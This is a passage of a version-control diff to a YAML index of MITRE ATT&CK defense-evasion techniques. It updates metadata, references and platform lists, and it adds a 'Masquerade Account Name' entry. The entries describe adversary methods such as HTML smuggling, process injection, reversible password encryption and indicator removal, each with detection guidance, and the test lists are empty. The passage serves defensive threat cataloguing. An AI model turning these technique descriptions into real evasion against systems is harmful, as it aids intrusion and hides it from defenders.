+    atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -11703,10 +11959,9 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -11743,40 +11998,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1578.002:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
-      type: attack-pattern
-      created: '2020-05-14T14:45:15.978Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.002
-        url: https://attack.mitre.org/techniques/T1578/002
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS CloudTrail Search
-        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
-        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
-          Retrieved June 17, 2020.
-      - source_name: Azure Activity Logs
-        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
-        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
-          2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.416Z'
       name: Create Cloud Instance
       description: |-
         An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
@@ -11785,20 +12010,50 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
 
         In AWS, CloudTrail logs capture the creation of an instance in the <code>RunInstances</code> event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of <code>gcloud compute instances create</code> to create a VM.(Citation: Cloud Audit Logs)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Instance: Instance Creation'
       - 'Instance: Instance Metadata'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
+      created: '2020-05-14T14:45:15.978Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/002
+        external_id: T1578.002
+      - source_name: AWS CloudTrail Search
+        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+          Retrieved June 17, 2020.
+        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure Activity Logs
+        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+          2020.
+        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.009:
     technique:
@@ -11828,7 +12083,7 @@ defense-evasion:
         url: http://man7.org/linux/man-pages/man1/dd.1.html
         description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
           February 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-20T22:25:55.331Z'
       name: Proc Memory
       description: "Adversaries may inject malicious code into processes via the /proc
         filesystem in order to evade process-based defenses as well as possibly elevate
@@ -11871,8 +12126,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1601.001:
     technique:
@@ -11919,7 +12172,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:50:46.560Z'
       name: Patch System Image
       description: "Adversaries may modify the operating system of a network device
         to introduce new capabilities or weaken existing defenses.(Citation: Killing
@@ -11985,12 +12238,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T22:30:01.227Z'
       name: Clear Persistence
       description: |-
         Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)
@@ -12045,33 +12296,84 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
-  T1556.001:
+  T1036.010:
     technique:
-      x_mitre_platforms:
-      - Windows
+      modified: '2024-10-17T15:20:36.705Z'
+      name: Masquerade Account Name
+      description: "Adversaries may match or approximate the names of legitimate accounts
+        to make newly created ones appear benign. This will typically occur during
+        [Create Account](https://attack.mitre.org/techniques/T1136), although accounts
+        may also be renamed at a later date. This may also coincide with [Account
+        Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first
+        deletes an account before re-creating one with the same name.(Citation: Huntress
+        MOVEit 2023)\n\nOften, adversaries will attempt to masquerade as service accounts,
+        such as those associated with legitimate software, data backups, or container
+        cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec
+        Kubernetes Attack 2023) They may also give accounts generic, trustworthy names,
+        such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware
+        2024) Sometimes adversaries may model account names off of those already existing
+        in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).
+        \ \n\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656),
+        which describes impersonating specific trusted individuals or organizations,
+        rather than user or service account names.  "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Menachem Goldstein
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - SaaS
+      - IaaS
+      - Containers
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'User Account: User Account Creation'
       type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
+      id: attack-pattern--d349c66e-18e1-4d8b-a2d7-65af7cbd2ba0
+      created: '2024-08-05T21:39:16.274Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1036/010
+        external_id: T1036.010
+      - source_name: Elastic CUBA Ransomware 2022
+        description: Daniel Stepanic, Derek Ditch, Seth Goodwin, Salim Bitam, Andrew
+          Pease. (2022, September 7). CUBA Ransomware Campaign Analysis. Retrieved
+          August 5, 2024.
+        url: https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis
+      - source_name: Invictus IR Cloud Ransomware 2024
+        description: Invictus IR. (2024, January 11). Ransomware in the cloud. Retrieved
+          August 5, 2024.
+        url: https://www.invictus-ir.com/news/ransomware-in-the-cloud
+      - source_name: Huntress MOVEit 2023
+        description: John Hammond. (2023, June 1). MOVEit Transfer Critical Vulnerability
+          CVE-2023-34362 Rapid Response. Retrieved August 5, 2024.
+        url: https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
+      - source_name: Aquasec Kubernetes Attack 2023
+        description: Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever
+          Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14,
+          2023.
+        url: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.001:
+    technique:
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -12092,6 +12394,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -12106,22 +12409,42 @@ defense-evasion:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1027.006:
     technique:
-      modified: '2023-07-14T14:01:41.475Z'
+      modified: '2024-09-12T19:12:13.006Z'
       name: HTML Smuggling
       description: |-
         Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
@@ -12179,48 +12502,17 @@ defense-evasion:
         url: https://www.menlosecurity.com/blog/new-attack-alert-duri
       - source_name: nccgroup Smuggling HTA 2017
         description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
-          Explorer/Edge. Retrieved May 20, 2021.
-        url: https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/
+          Explorer/Edge. Retrieved September 12, 2024.
+        url: https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027.006
     atomic_tests: []
   T1556.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
-      type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -12242,6 +12534,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -12252,23 +12545,50 @@ defense-evasion:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1027.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T19:43:18.873Z'
       name: Command Obfuscation
       description: |-
         Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)
@@ -12309,8 +12629,9 @@ defense-evasion:
         url: https://attack.mitre.org/techniques/T1027/010
         external_id: T1027.010
       - source_name: Twitter Richard WMIC
-        description: Ackroyd, R. (2023, March 24). Twitter. Retrieved March 24, 2023.
-        url: https://twitter.com/rfackroyd/status/1639136000755765254
+        description: Ackroyd, R. (2023, March 24). Twitter. Retrieved September 12,
+          2024.
+        url: https://x.com/rfackroyd/status/1639136000755765254
       - source_name: Invoke-Obfuscation
         description: Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved
           March 17, 2023.
@@ -12346,43 +12667,23 @@ defense-evasion:
         url: https://redcanary.com/threat-detection-report/techniques/powershell/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1070.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Walker Johnson
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
-      created: '2020-01-31T12:35:36.479Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1070.004
-        url: https://attack.mitre.org/techniques/T1070/004
-      - source_name: Microsoft SDelete July 2016
-        url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
-        description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
-          8, 2018.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:33:59.107Z'
+      name: 'Indicator Removal on Host: File Deletion'
       description: |-
         Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
 
         There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include <code>del</code> on Windows and <code>rm</code> or <code>unlink</code> on Linux and macOS.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Indicator Removal on Host: File Deletion'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Walker Johnson
+      x_mitre_deprecated: false
       x_mitre_detection: It may be uncommon for events related to benign command-line
         functions such as DEL or third-party utilities or tools to be found in an
         environment, depending on the user base and how systems are typically used.
@@ -12393,18 +12694,36 @@ defense-evasion:
         network that an adversary could introduce. Some monitoring tools may collect
         command-line arguments, but may not capture DEL commands since DEL is a native
         function within cmd.exe.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Deletion'
       x_mitre_defense_bypassed:
       - Host forensic analysis
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
+      created: '2020-01-31T12:35:36.479Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/004
+        external_id: T1070.004
+      - source_name: Microsoft SDelete July 2016
+        description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
+          8, 2018.
+        url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.004
     atomic_tests: []
   T1221:
@@ -12466,7 +12785,7 @@ defense-evasion:
         description: Hanson, R. (2016, September 24). phishery. Retrieved July 21,
           2018.
         source_name: ryhanson phishery SEPT 2016
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-01-12T18:16:56.176Z'
       name: Template Injection
       description: |-
         Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
@@ -12496,13 +12815,11 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1221
     atomic_tests: []
   T1134:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.762Z'
       name: Access Token Manipulation
       description: |-
         Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -12599,7 +12916,6 @@ defense-evasion:
         url: https://pentestlab.blog/2017/04/03/token-manipulation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1027.002:
     technique:
@@ -12662,7 +12978,6 @@ defense-evasion:
         url: https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1027.002
     atomic_tests: []
   T1564.005:
@@ -12700,7 +13015,7 @@ defense-evasion:
         description: 'Kaspersky Lab''s Global Research and Analysis Team. (2015, February).
           Equation Group: Questions and Answers. Retrieved December 21, 2015.'
         url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-29T15:12:11.024Z'
       name: Hidden File System
       description: |-
         Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
@@ -12727,8 +13042,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1055.005:
     technique:
@@ -12756,7 +13069,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:24:54.198Z'
       name: Thread Local Storage
       description: "Adversaries may inject malicious code into processes via thread
         local storage (TLS) callbacks in order to evade process-based defenses as
@@ -12800,8 +13113,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1622:
     technique:
@@ -12856,7 +13167,7 @@ defense-evasion:
         Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
 
